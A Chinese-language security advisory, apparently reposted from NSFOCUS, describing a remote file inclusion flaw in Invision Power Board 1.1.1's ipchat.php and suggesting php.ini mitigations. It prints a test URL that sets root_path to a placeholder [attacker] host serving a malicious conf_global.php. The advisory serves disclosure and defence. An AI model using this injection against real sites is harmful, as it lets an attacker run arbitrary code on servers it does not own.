InvisionBoard ipchat.php远程文件包含漏洞

发布时间:2007年01月24日      浏览次数:1336 次
受影响系统:
  Invision PS Invision Board 1.1.1
  描述:
  --------------------------------------------------------------------------------
  BUGTRAQ ID: 6976
  Invision Power Board是一款强大的广泛流行的WEB公告版系统。
  Invision Power Board中的ipchat.php对用户提交的URI参数缺少正确检查,远程攻击者可以利用这个漏洞提交恶意URI参数指定包含远程服务器上的文件,以WEB进程权限在系统上执行任意命令。
  ipchat.php脚本包含如下代码:
  -------------------------------------
  require $root_path."conf_global.php";
  -------------------------------------
  由于对$root_path变量没有预定义,因此可以通过全局注入来进行变量定义,攻击者可以指定远程系统中的PHP文件作为参数提交给$root_path变量,可导致以WEB进程权限执行PHP文件中包含的恶意代码。
  <*来源:Frog Man (leseulfrog@hotmail.com)
   链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104637434104446&w=2
  *>
  测试方法:
  --------------------------------------------------------------------------------
  警 告
  以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
  Frog Man (leseulfrog@hotmail.com)提供了如下测试方法:
  http://[target]/ipchat.php?root_path=http://[attacker]/
  with :
  http://[attacker]/conf_global.php
  建议:
  --------------------------------------------------------------------------------
  临时解决方法:
  如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
  * 修改php.ini配置文件,设置‘allow_url_fopen‘和‘register_globals‘选项为‘off‘。
  * "Frog man"提供如下第三方补丁:
  http://www.phpsecure.org
  厂商补丁:
  Invision PS
  -----------
  目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
  http://www.invisionboard.com/
文章来源:http://www.duba.net/c/2003/03/09/59680.shtml
免责声明:本站相关技术文章信息部分来自网络,目的主要是传播更多信息,如果您认为本站的某些信息侵犯了您的版权,请与我们联系,我们会即时妥善的处理,谢谢合作!